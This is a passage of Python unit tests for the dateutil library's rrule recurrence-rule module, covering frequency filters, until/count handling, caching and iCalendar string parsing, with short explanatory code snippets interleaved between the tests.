bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByYearDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0, 0),
datetime(1997, 12, 31, 0, 0, 1),
datetime(1997, 12, 31, 0, 0, 2),
datetime(1997, 12, 31, 0, 0, 3)])
def testSecondlyByYearDayNeg(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0, 0),
datetime(1997, 12, 31, 0, 0, 1),
datetime(1997, 12, 31, 0, 0, 2),
datetime(1997, 12, 31, 0, 0, 3)])
def testSecondlyByMonthAndYearDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0, 0),
datetime(1998, 4, 10, 0, 0, 1),
datetime(1998, 4, 10, 0, 0, 2),
datetime(1998, 4, 10, 0, 0, 3)])
def testSecondlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0, 0),
datetime(1998, 4, 10, 0, 0, 1),
datetime(1998, 4, 10, 0, 0, 2),
datetime(1998, 4, 10, 0, 0, 3)])
def testSecondlyByWeekNo(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 0, 0, 0),
datetime(1998, 5, 11, 0, 0, 1),
datetime(1998, 5, 11, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 0, 0, 0),
datetime(1997, 12, 29, 0, 0, 1),
datetime(1997, 12, 29, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDayLarge(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0, 0),
datetime(1997, 12, 28, 0, 0, 1),
datetime(1997, 12, 28, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0, 0),
datetime(1997, 12, 28, 0, 0, 1),
datetime(1997, 12, 28, 0, 0, 2)])
def testSecondlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 0, 0, 0),
datetime(1998, 12, 28, 0, 0, 1),
datetime(1998, 12, 28, 0, 0, 2)])
def testSecondlyByEaster(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 0, 0, 0),
datetime(1998, 4, 12, 0, 0, 1),
datetime(1998, 4, 12, 0, 0, 2)])
def testSecondlyByEasterPos(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 0, 0, 0),
datetime(1998, 4, 13, 0, 0, 1),
datetime(1998, 4, 13, 0, 0, 2)])
def testSecondlyByEasterNeg(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 0, 0, 0),
datetime(1998, 4, 11, 0, 0, 1),
datetime(1998, 4, 11, 0, 0, 2)])
def testSecondlyByHour(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 0),
datetime(1997, 9, 2, 18, 0, 1),
datetime(1997, 9, 2, 18, 0, 2)])
def testSecondlyByMinute(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 0),
datetime(1997, 9, 2, 9, 6, 1),
datetime(1997, 9, 2, 9, 6, 2)])
def testSecondlyBySecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 2, 9, 1, 6)])
def testSecondlyByHourAndMinute(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 0),
datetime(1997, 9, 2, 18, 6, 1),
datetime(1997, 9, 2, 18, 6, 2)])
def testSecondlyByHourAndSecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 2, 18, 1, 6)])
def testSecondlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testSecondlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testSecondlyByHourAndMinuteAndSecondBug(self):
# This explores a bug found by Mathieu Bridon.
self.assertEqual(list(rrule(SECONDLY,
count=3,
bysecond=(0,),
byminute=(1,),
dtstart=datetime(2010, 3, 22, 12, 1))),
[datetime(2010, 3, 22, 12, 1),
datetime(2010, 3, 22, 13, 1),
datetime(2010, 3, 22, 14, 1)])
def testLongIntegers(self):
if not PY3:  # Python 3 has no separate 'long' type
self.assertEqual(list(rrule(MINUTELY,
count=long(2),
interval=long(2),
bymonth=long(2),
byweekday=long(3),
byhour=long(6),
byminute=long(6),
bysecond=long(6),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 2, 5, 6, 6, 6),
datetime(1998, 2, 12, 6, 6, 6)])
self.assertEqual(list(rrule(YEARLY,
count=long(2),
bymonthday=long(5),
byweekno=long(2),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 9, 0),
datetime(2004, 1, 5, 9, 0)])
def testHourlyBadRRule(self):
"""
When `byhour` is specified with `freq=HOURLY`, there are certain
combinations of `dtstart` and `byhour` which result in an rrule with no
valid values.
See https://github.com/dateutil/dateutil/issues/4
"""
self.assertRaises(ValueError, rrule, HOURLY,
**dict(interval=4, byhour=(7, 11, 15, 19),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testMinutelyBadRRule(self):
"""
See :func:`testHourlyBadRRule` for details.
"""
self.assertRaises(ValueError, rrule, MINUTELY,
**dict(interval=12, byminute=(10, 11, 25, 39, 50),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testSecondlyBadRRule(self):
"""
See :func:`testHourlyBadRRule` for details.
"""
self.assertRaises(ValueError, rrule, SECONDLY,
**dict(interval=10, bysecond=(2, 15, 37, 42, 59),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testMinutelyBadComboRRule(self):
"""
Certain values of :param:`interval` in :class:`rrule`, when combined
with certain values of :param:`byhour` create rules which apply to no
valid dates. The library should detect this case in the iterator and
raise a :exception:`ValueError`.
"""
# In Python 2.7 you can use a context manager for this.
def make_bad_rrule():
list(rrule(MINUTELY, interval=120, byhour=(10, 12, 14, 16),
count=2, dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertRaises(ValueError, make_bad_rrule)
def testSecondlyBadComboRRule(self):
"""
See :func:`testMinutelyBadComboRRule' for details.
"""
# In Python 2.7 you can use a context manager for this.
def make_bad_minute_rrule():
list(rrule(SECONDLY, interval=360, byminute=(10, 28, 49),
count=4, dtstart=datetime(1997, 9, 2, 9, 0)))
def make_bad_hour_rrule():
list(rrule(SECONDLY, interval=43200, byhour=(2, 10, 18, 23),
count=4, dtstart=datetime(1997, 9, 2, 9, 0)))
self.assertRaises(ValueError, make_bad_minute_rrule)
self.assertRaises(ValueError, make_bad_hour_rrule)
def testBadUntilCountRRule(self):
"""
See rfc-5545 3.3.10 - This checks for the deprecation warning, and will
eventually check for an error.
"""
with self.assertWarns(DeprecationWarning):
rrule(DAILY, dtstart=datetime(1997, 9, 2, 9, 0),
count=3, until=datetime(1997, 9, 4, 9, 0))
def testUntilNotMatching(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 5, 8, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testUntilMatching(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 4, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testUntilSingle(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0)])
def testUntilEmpty(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=datetime(1997, 9, 1, 9, 0))),
[])
def testUntilWithDate(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0),
until=date(1997, 9, 5))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testWkStIntervalMO(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=2,
byweekday=(TU, SU),
wkst=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testWkStIntervalSU(self):
self.assertEqual(list(rrule(WEEKLY,
count=3,
interval=2,
byweekday=(TU, SU),
wkst=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testDTStartIsDate(self):
self.assertEqual(list(rrule(DAILY,
count=3,
dtstart=date(1997, 9, 2))),
[datetime(1997, 9, 2, 0, 0),
datetime(1997, 9, 3, 0, 0),
datetime(1997, 9, 4, 0, 0)])
def testDTStartWithMicroseconds(self):
self.assertEqual(list(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0, 0, 500000))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testMaxYear(self):
self.assertEqual(list(rrule(YEARLY,
count=3,
bymonth=2,
bymonthday=31,
dtstart=datetime(9997, 9, 2, 9, 0, 0))),
[])
def testGetItem(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[0],
datetime(1997, 9, 2, 9, 0))
def testGetItemNeg(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[-1],
datetime(1997, 9, 4, 9, 0))
def testGetItemSlice(self):
self.assertEqual(rrule(DAILY,
# count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[1:2],
[datetime(1997, 9, 3, 9, 0)])
def testGetItemSliceEmpty(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[:],
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0)])
def testGetItemSliceStep(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))[::-2],
[datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 2, 9, 0)])
def testCount(self):
self.assertEqual(rrule(DAILY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)).count(),
3)
def testCountZero(self):
self.assertEqual(rrule(YEARLY,
count=0,
dtstart=datetime(1997, 9, 2, 9, 0)).count(),
0)
def testContains(self):
rr = rrule(DAILY, count=3, dtstart=datetime(1997, 9, 2, 9, 0))
self.assertEqual(datetime(1997, 9, 3, 9, 0) in rr, True)
def testContainsNot(self):
rr = rrule(DAILY, count=3, dtstart=datetime(1997, 9, 2, 9, 0))
self.assertEqual(datetime(1997, 9, 3, 9, 0) not in rr, False)
def testBefore(self):
self.assertEqual(rrule(DAILY, # count=5
dtstart=datetime(1997, 9, 2, 9, 0)).before(datetime(1997, 9, 5, 9, 0)),
datetime(1997, 9, 4, 9, 0))
def testBeforeInc(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.before(datetime(1997, 9, 5, 9, 0), inc=True),
datetime(1997, 9, 5, 9, 0))
def testAfter(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.after(datetime(1997, 9, 4, 9, 0)),
datetime(1997, 9, 5, 9, 0))
def testAfterInc(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.after(datetime(1997, 9, 4, 9, 0), inc=True),
datetime(1997, 9, 4, 9, 0))
def testXAfter(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0))
.xafter(datetime(1997, 9, 8, 9, 0), count=12)),
[datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 9, 17, 9, 0),
datetime(1997, 9, 18, 9, 0),
datetime(1997, 9, 19, 9, 0),
datetime(1997, 9, 20, 9, 0)])
def testXAfterInc(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0))
.xafter(datetime(1997, 9, 8, 9, 0), count=12, inc=True)),
[datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 9, 17, 9, 0),
datetime(1997, 9, 18, 9, 0),
datetime(1997, 9, 19, 9, 0)])
def testBetween(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.between(datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 6, 9, 0)),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0)])
def testBetweenInc(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.between(datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 6, 9, 0), inc=True),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0)])
def testCachePre(self):
rr = rrule(DAILY, count=15, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
self.assertEqual(list(rr),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testCachePost(self):
rr = rrule(DAILY, count=15, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
for x in rr: pass  # exhaust the iterator to populate the cache
self.assertEqual(list(rr),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testCachePostInternal(self):
rr = rrule(DAILY, count=15, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
for x in rr: pass  # exhaust the iterator to populate the cache
self.assertEqual(rr._cache,
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testCachePreContains(self):
rr = rrule(DAILY, count=3, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
self.assertIn(datetime(1997, 9, 3, 9, 0), rr)
def testCachePostContains(self):
rr = rrule(DAILY, count=3, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
for x in rr: pass  # exhaust the iterator to populate the cache
self.assertIn(datetime(1997, 9, 3, 9, 0), rr)
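# What cache=True buys you, in isolation: repeated iteration and
# membership tests reuse the memoised occurrence list instead of
# re-running the recurrence algorithm.

```python
from datetime import datetime

from dateutil.rrule import rrule, DAILY

rr = rrule(DAILY, count=3, cache=True,
           dtstart=datetime(1997, 9, 2, 9, 0))

first_pass = list(rr)
second_pass = list(rr)  # served from the cache on re-iteration
hit = datetime(1997, 9, 3, 9, 0) in rr  # membership also uses the cache
```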
def testStr(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
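# The parsing entry point used by all the testStr* cases below, in its
# simplest form: rrulestr() turns an iCalendar (RFC 5545) DTSTART/RRULE
# snippet into an rrule object.

```python
from datetime import datetime

from dateutil.rrule import rrulestr

rr = rrulestr(
    "DTSTART:19970902T090000\n"
    "RRULE:FREQ=YEARLY;COUNT=3\n"
)
dates = list(rr)
```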
def testStrType(self):
self.assertIsInstance(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3\n"
), rrule)
def testStrForceSetType(self):
self.assertIsInstance(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3\n"
, forceset=True), rruleset)
def testStrSetType(self):
self.assertIsInstance(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=2;BYDAY=TU\n"
"RRULE:FREQ=YEARLY;COUNT=1;BYDAY=TH\n"
), rruleset)
def testStrCase(self):
self.assertEqual(list(rrulestr(
"dtstart:19970902T090000\n"
"rrule:freq=yearly;count=3\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrSpaces(self):
self.assertEqual(list(rrulestr(
" DTSTART:19970902T090000 "
" RRULE:FREQ=YEARLY;COUNT=3 "
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrSpacesAndLines(self):
self.assertEqual(list(rrulestr(
" DTSTART:19970902T090000 \n"
" \n"
" RRULE:FREQ=YEARLY;COUNT=3 \n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrNoDTStart(self):
self.assertEqual(list(rrulestr(
"RRULE:FREQ=YEARLY;COUNT=3\n"
, dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrValueOnly(self):
self.assertEqual(list(rrulestr(
"FREQ=YEARLY;COUNT=3\n"
, dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrUnfold(self):
self.assertEqual(list(rrulestr(
"FREQ=YEA\n RLY;COUNT=3\n", unfold=True,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrSet(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=2;BYDAY=TU\n"
"RRULE:FREQ=YEARLY;COUNT=1;BYDAY=TH\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testStrSetDate(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=1;BYDAY=TU\n"
"RDATE:19970904T090000\n"
"RDATE:19970909T090000\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testStrSetExRule(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=6;BYDAY=TU,TH\n"
"EXRULE:FREQ=YEARLY;COUNT=3;BYDAY=TH\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testStrSetExDate(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=6;BYDAY=TU,TH\n"
"EXDATE:19970904T090000\n"
"EXDATE:19970911T090000\n"
"EXDATE:19970918T090000\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
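# When the input contains more than one component (here an RRULE plus
# EXDATE lines, as in the test above), rrulestr() returns an rruleset
# and the EXDATE occurrences are subtracted from the RRULE's output.

```python
from datetime import datetime

from dateutil.rrule import rrulestr, rruleset

rs = rrulestr(
    "DTSTART:19970902T090000\n"
    "RRULE:FREQ=YEARLY;COUNT=6;BYDAY=TU,TH\n"
    "EXDATE:19970904T090000\n"
    "EXDATE:19970911T090000\n"
    "EXDATE:19970918T090000\n"
)
dates = list(rs)
```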
def testStrSetDateAndExDate(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RDATE:19970902T090000\n"
"RDATE:19970904T090000\n"
"RDATE:19970909T090000\n"
"RDATE:19970911T090000\n"
"RDATE:19970916T090000\n"
"RDATE:19970918T090000\n"
"EXDATE:19970904T090000\n"
"EXDATE:19970911T090000\n"
"EXDATE:19970918T090000\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testStrSetDateAndExRule(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RDATE:19970902T090000\n"
"RDATE:19970904T090000\n"
"RDATE:19970909T090000\n"
"RDATE:19970911T090000\n"
"RDATE:19970916T090000\n"
"RDATE:19970918T090000\n"
"EXRULE:FREQ=YEARLY;COUNT=3;BYDAY=TH\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testStrKeywords(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3;INTERVAL=3;"
"BYMONTH=3;BYWEEKDAY=TH;BYMONTHDAY=3;"
"BYHOUR=3;BYMINUTE=3;BYSECOND=3\n"
)),
[datetime(2033, 3, 3, 3, 3, 3),
datetime(2039, 3, 3, 3, 3, 3),
datetime(2072, 3, 3, 3, 3, 3)])
def testStrNWeekDay(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3;BYDAY=1TU,-1TH\n"
)),
[datetime(1997, 12, 25, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 12, 31, 9, 0)])
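# The nth-weekday syntax exercised above, spelled out: in a YEARLY rule
# BYDAY=1TU,-1TH means "the first Tuesday and the last Thursday of each
# year".

```python
from datetime import datetime

from dateutil.rrule import rrulestr

rr = rrulestr(
    "DTSTART:19970902T090000\n"
    "RRULE:FREQ=YEARLY;COUNT=3;BYDAY=1TU,-1TH\n"
)
# Starting Sep 2 1997, the first match is the last Thursday of 1997,
# then the first Tuesday and last Thursday of 1998.
dates = list(rr)
```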
def testStrUntil(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;"
"UNTIL=19990101T000000;BYDAY=1TU,-1TH\n"
)),
[datetime(1997, 12, 25, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 12, 31, 9, 0)])
def testStrValueDatetime(self):
rr = rrulestr("DTSTART;VALUE=DATE-TIME:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=2")
self.assertEqual(list(rr), [datetime(1997, 9, 2, 9, 0, 0),
datetime(1998, 9, 2, 9, 0, 0)])
def testStrValueDate(self):
rr = rrulestr("DTSTART;VALUE=DATE:19970902\n"
"RRULE:FREQ=YEARLY;COUNT=2")
self.assertEqual(list(rr), [datetime(1997, 9, 2, 0, 0, 0),
datetime(1998, 9, 2, 0, 0, 0)])
def testStrInvalidUntil(self):
with self.assertRaises(ValueError):
list(rrulestr("DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;"
"UNTIL=TheCowsComeHome;BYDAY=1TU,-1TH\n"))
def testStrEmptyByDay(self):
with self.assertRaises(ValueError):
list(rrulestr("DTSTART:19970902T090000\n"
"FREQ=WEEKLY;"
"BYDAY=;" # This part is invalid
"WKST=SU"))
def testStrInvalidByDay(self):
with self.assertRaises(ValueError):
list(rrulestr("DTSTART:19970902T090000\n"
"FREQ=WEEKLY;"
"BYDAY=-1OK;" # This part is invalid
"WKST=SU"))
def testBadBySetPos(self):
self.assertRaises(ValueError,
rrule, MONTHLY,
count=1,
bysetpos=0,
dtstart=datetime(1997, 9, 2, 9, 0))
def testBadBySetPosMany(self):
self.assertRaises(ValueError,
rrule, MONTHLY,
count=1,
bysetpos=(-1, 0, 1),
dtstart=datetime(1997, 9, 2, 9, 0))
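# The validation the two tests above rely on: bysetpos values must be
# non-zero (RFC 5545 allows 1..366 and -366..-1), and an invalid value
# is rejected when the rrule is constructed.

```python
from datetime import datetime

from dateutil.rrule import rrule, MONTHLY

try:
    rrule(MONTHLY, count=1, bysetpos=0,
          dtstart=datetime(1997, 9, 2, 9, 0))
    raised = False
except ValueError:
    raised = True
```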
# Tests to ensure that str(rrule) works
def testToStrYearly(self):
rule = rrule(YEARLY, count=3, dtstart=datetime(1997, 9, 2, 9, 0))
self._rrulestr_reverse_test(rule)
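# The _rrulestr_reverse_test helper used throughout the testToStr*
# cases checks that a rule survives a str()/rrulestr() round trip;
# a minimal sketch of the same idea:

```python
from datetime import datetime

from dateutil.rrule import rrule, rrulestr, YEARLY

original = rrule(YEARLY, count=3, interval=2,
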